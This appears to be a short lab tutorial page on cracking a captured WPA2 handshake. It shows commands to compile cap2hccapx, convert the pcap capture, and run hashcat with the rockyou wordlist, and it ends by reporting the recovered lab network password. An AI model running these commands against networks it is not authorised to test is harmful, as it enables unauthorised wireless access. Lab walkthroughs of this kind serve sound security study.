Comment on page
Cracking WPA2 Handshake
This section will cover how to crack a WPA2 handshakes captured with the previously showcased attack vector
We need to convert the captured
.hccapxformat in order to start cracking with it. There's a tool named
cap2hccapxwhich can help us do this. However, we first need to download and compile it on our unix system.
- Downloading Source
- Compiling Tool
gcc -o cap2hccapx cap2hccapx.c
- Testing Tool
Now that we have the tool compiled and ready to go, we can convert the file and prep it for cracking!
cap2hccapx E4-6F-13-FA-AD-E0_partial.pcap capture.hccapx
.\hashcat.exe -m 2500 .\hashes\capture.hccapx .\wordlists\rockyou.txt --force
tinkerbell is the PSK of the network in question
We were successfully able to crack the handshake and retrieve the password to the lab network!